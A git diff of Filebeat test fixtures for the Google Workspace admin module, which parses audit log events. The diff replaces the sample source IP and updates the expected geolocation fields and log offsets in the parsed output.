+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json
index 16b088935bd0..edd79299bfeb 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion",
@@ -24,24 +24,20 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -65,7 +61,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation",
@@ -78,27 +74,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 388,
+        "log.offset": 387,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -122,7 +114,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -137,27 +129,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 778,
+        "log.offset": 776,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -181,7 +169,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -195,27 +183,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1238,
+        "log.offset": 1235,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -239,7 +223,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -252,27 +236,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1649,
+        "log.offset": 1645,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -296,7 +276,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -309,27 +289,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2031,
+        "log.offset": 2026,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -353,7 +329,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -366,27 +342,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2413,
+        "log.offset": 2407,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -410,7 +382,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -423,27 +395,23 @@
